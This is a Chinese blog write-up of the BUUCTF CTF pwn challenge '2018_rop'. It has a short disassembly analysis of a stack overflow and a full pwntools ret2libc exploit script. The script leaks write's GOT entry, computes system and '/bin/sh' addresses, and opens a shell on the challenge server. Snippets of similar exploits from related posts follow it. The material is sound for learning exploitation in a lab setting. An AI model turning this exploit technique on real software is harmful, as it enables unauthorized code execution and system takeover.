BUUCTF pwn——铁人三项(第五赛区)_2018_rop

最新推荐文章于 2024-01-08 12:52:27 发布
最新推荐文章于 2024-01-08 12:52:27 发布
阅读量151 收藏
点赞数
分类专栏: [个人向]做题练习WP 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45770420/article/details/130068470
版权

checksec && 运行

在这里插入图片描述

ida

main函数输出字符串:

不重要,调用的vulnerable_function()才是重点
在这里插入图片描述

存在名为vulnerable_function()的函数,存在溢出

在这里插入图片描述

存在名为be_nice_to_people()的函数,控制权限的,这题不用管

在这里插入图片描述

给输入分配的栈空间为0x88

在这里插入图片描述

利用思路

让vulnerable_function()的输入溢出

代码

'''
@Author       : 白银
@Date         : 2023-04-10 17:36:03
@LastEditors  : 白银
@LastEditTime : 2023-04-10 19:37:35
@FilePath     : /pwn/2018_rop.py
@Description  : https://buuoj.cn/challenges#%E9%93%81%E4%BA%BA%E4%B8%89%E9%A1%B9(%E7%AC%AC%E4%BA%94%E8%B5%9B%E5%8C%BA)_2018_rop
@Attention    : 
@Copyright (c) 2023 by 白银 captain-jparrow@qq.com, All Rights Reserved. 
'''

from pwn import *
from libcfind import *

set_arch = 2  # set_arch中,int,0→amd64,1→arm64,2→i386
pwnfile = './2018_rop'  # pwnfile, str,二进制文件
if_remote = 1  # if_remote,int,1→远程,别的数字→本地
# 打本地,if_remote改别的数字就可以,最后两个参数随便改

# set_arch = 0
if set_arch == 0:
    context(log_level='debug', arch='amd64', os='linux')
elif set_arch == 1:
    context(log_level='debug', arch='arm64', os='linux')
elif set_arch == 2:
    context(log_level='debug', arch='i386', os='linux')

print(context)
# context(log_level='debug', arch='i386', os='linux')
# pwnfile = './pwn1'
elf = ELF(pwnfile)

if if_remote == 1:
    # io = remote("192.168.61.139", 8888)
    # io = remote(remote_addr, remote_port)
    io = remote("node4.buuoj.cn", 29669)
    # libc = ELF('/home/usrname/Desktop/libc.so.6')
    if set_arch == 0 or set_arch == 1:
        # libc = elf.libc
        libc = ELF('/home/usrname/Desktop/libc-2.23.so')
        # libc = ELF('/home/usrname/Desktop/2.23x64libc.so.6')
    else:
        # libc = elf.libc
        libc = ELF('/home/usrname/Desktop/libc-2.23.so')
        # libc = ELF('/home/usrname/Desktop/2.23x86libc.so.6')
else:
    io = process(pwnfile)
    # 本地用
    # elf = ELF(pwnfile)
    libc = elf.libc
    # libc = ELF('/home/usrname/Desktop/libc-2.23.so')
    rop = ROP(pwnfile)
    # 本地调试用
    gdb.attach(io)
    pause()

padding = 0x8c  # ida看,上限和s差多少,加上r
write_plt = elf.plt['write']
print("write_plt------", hex(write_plt))
write_got = elf.got['write']
print("write_got------", hex(write_got))
main_addr = elf.symbols['main']
print("main_addr------", hex(main_addr))

# 1 是文件描述符,表示标准输出
# write_got在write函数内部被解释为输出的数据的地址;
# 4 是要写入到标准输出的字节数
# ssize_t write(int fd, const void *buf, size_t count); //这是write函数
# ssize_t write(1, write_got, 4); //这是payload的布局
# 利用write()函数向输出流中写入数据,在这个过程中泄露出libc基址
payload = flat(['a' * padding , write_plt, main_addr, 1, write_got, 4])
io.sendline(payload)

write_addr = u32(io.recv(4))# x86一个指针占4字节
print("write_addr------", hex(write_addr))
    
libc = finder('write', write_addr)
libc_base = write_addr - libc.dump('write')
system_addr = libc_base + libc.dump('system')
binsh_addr = libc_base + libc.dump('str_bin_sh')

payload2 = flat(['a' * padding, system_addr, 0xdeadbeef, binsh_addr]) # x86在函数和参数之间要占位符

sleep(1)
io.sendline(payload2)

io.interactive()

拿到shell,cat flag

在这里插入图片描述

Captain杰派罗
关注
专栏目录
BUUCTF pwn——pwnable_orw
CNS-Enterprise BCC-1701-J
05-06 283
BUUCTF 做题练习
BUUCTF pwn [HarekazeCTF2019]baby_rop
菜的只能随便写写博客
02-13 2628
0x01 文件分析   0x02 运行  一组回显   0x03 IDA  程序之中存在system函数,通过搜索字符串,还能得到’/bin/sh’字符串,一个简单的rop。   0x04 思路  简单rop,利用万能的gadget,pop rdi ret传入字符串并调用system,得到shell。此题flag的位置在/home/babyrop内,可以通过find -name flag...
2018年信息安全铁人三项赛数据赛题题目(数据包分析)
04-30
信息安全铁人三项赛应运而生,这是一项面向全国大学生的公益性科技类竞赛,旨在通过整合信息安全产业资源、对接高校,为大学生提供一个进行信息安全技术创新、深入产业行业应用以及扩展安全视野的平台。资源为分区决赛数据赛题目
BUUCTF--铁人三项(第五赛区)_2018_rop1
最新发布
qq_30528603的博客
01-08 606
我这是打本地的代码,远程的话给了libc用libc,没给libc用LibcSearcher,个人感觉不太好用,很多时候找不到。漏洞点主要在vulnerable_function()函数中。1.第一次布局通过题目中的write,puts等函数将库函数地址泄露,并能返回到主程序。2.通过计算算出libc基地址进一步得到system地址。这题是一题标准的rop。3.找到libc中bin/sh的位置。4.第二次布局就是直接布置rop
BUUCTF(pwn)铁人三项(第五赛区)_2018_rop
半岛铁盒的博客
03-30 374
最基本的 rop; from pwn import* from LibcSearcher import* r=remote('node3.buuoj.cn',25292) elf=ELF('./2') write_got=elf.got['write'] write_plt=elf.plt['write'] main=0x80484c6 payload='a'*(0x88+4)+p32(write_plt)+p32(main)+p32(1)+p32(write_got)+p32(4) r.sendl
[BUUCTF-pwn]——铁人三项(第五赛区)_2018_rop
Y_peak的博客
02-11 484
[BUUCTF-pwn]——铁人三项(第五赛区)_2018_rop 题目地址: https://buuoj.cn/challenges#铁人三项(第五赛区)_2018_rop 思路:没有sytem函数,所以应该需要自己去找. 从旁边的函数列表发现了write函数,可以利用将 read 函数的 got所储存的内容泄露出来,泄露出read函数的实际地址 。利用循环调用,再次调用read函数, 然后利用偏移找到system函数和 '/bin/sh'字符串的位置。最后组成payload exploit
BUUCTFPWN铁人三项(第五赛区)_2018_rop
m0_55368674的博客
01-15 381
BUUCTFPWN铁人三项(第五赛区)_2018_rop题解
pwn学习资料整理——ROP技术(pwn_rop1)
08-30
pwn学习资料整理——ROP技术(pwn_rop1)
pwn学习资料整理——ROP技术(pwn_rop2)
08-30
pwn学习资料整理——ROP技术(pwn_rop2)
[BUUCTF]PWN-wdb_2018_3rd_soEasy
红凳子的博客
05-07 463
[BUUCTF]PWN-wdb_2018_3rd_soEasy前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 一、pandas是什么? 二、使用步骤 1.引入库 代码如下(示例): import numpy as np import pandas as pd impo
buuctf|pwn-铁人三项(第五赛区)_2018_rop-wp
l2645470582_的博客
11-09 735
1.检查保护机制 2.我们用32位的IDA打开该文件 shift+f12查看关键字符串,没有发现关键字符串 3.我们查看main函数里面的内容 我们发现有两个函数 进入第一个函数 进入第二个函数 在第二个函数里面发现buf溢出,buf有0x88个字节,但是read()函数读取了0x100个字节 4.system("/bin/sh") 我们在文件中没有找到可以拿到shellcode权限 所以我们要用libc,计算偏移量,拿到shellcode权限...
[BUUCTF]PWN——铁人三项(第五赛区)_2018_rop
BangSen1的博客
03-22 249
铁人三项(第五赛区)_2018_rop 32位,开启NX保护 运行程序。 用IDA打开,跳转到main函数 没有什么有用的信息,vulnerable_function()函数是输入点。 利用write函数来泄露程序的libc版本 知道libc版本后再计算程序里的system函数和字符串“/bin/sh”的地址 最后再覆盖返回地址 from pwn import * from LibcSearcher import * r=remote('node3.buuoj.cn',27850) elf=ELF
铁人三项(第五赛区)_2018_rop
、moddemod
06-20 638
exp #!/usr/bin/env python3 # coding=utf-8 from pwn import * from LibcSearcher import * context(log_level='debug') proc_name = './2018_rop' p = process(proc_name) p = remote('node3.buuoj.cn', 25414) elf = ELF(proc_name) write_plt = elf.plt['write'] read_.
铁人三项(第五赛区)2018 rop
pondzhang的专栏
05-09 528
from pwn import * p = process('./2018_rop') gotwrite = 0x0804A010 pltwrite = 0x080483A0 start = 0x080483C0 bss = 0x0804A020 pltread = 0x08048360 def leak(address): payload = 'a' * 140 + p32(pltwrite) + p32(start) + p32(0x01) + p32(address) + p32(0x04
buuctf 铁人三项(第五赛区)_2018_rop
carol2358的博客
04-26 399
常规的32位泄漏libc,比较蛋痛的是我常规的写法不知道为什么出错,以后要多注意recv到的东西 exp: from pwn import * from LibcSearcher import * local_file = './2018_rop' local_libc = './libc.so.6' remote_libc = './libc.so.6' select = 1 ...
2023 铁人三项 CTF --- Misc wp
3tefanie丶zhou的博客
01-12 2448
【不被喜欢的姑娘喜欢,是一件很伤心的事情,可天没有塌下来,该怎么活,还得怎么活。】
write函数的详解与read函数的详解
热门推荐
dangzhangjing97的博客
03-20 8万+
write() 头文件:#include<unistd.h> 原型: ssize_t write(int fd,const void*buf,size_t count); 参数说明: fd:是文件描述符(write所对应的是写,即就是1) buf:通常是一个字符串,需要写入的字符串 count:是每次写入的字节数 返回值: 成功:返回写入的字节数...
[PWN] BUUCTF 铁人三项(第五赛区)_2018_rop 1(ret2libc3)
空城惜梦的博客
06-04 1198
@[TOC]( [PWN] BUUCTF 铁人三项(第五赛区)_2018_rop)
CTF2018_rop
凉水的博客
06-17 483
2018_rop
buuctf pwn 第五空间决赛pwn5
09-28
buuctf pwn 第五空间决赛pwn5是一个CTF pwn题,它涉及到格式化字符串漏洞。格式化字符串漏洞是一种常见的安全漏洞,利用这个漏洞可以读取或修改程序的内存中的数据,从而导致程序行为异常或者攻击者获取敏感信息。在...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Captain杰派罗

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值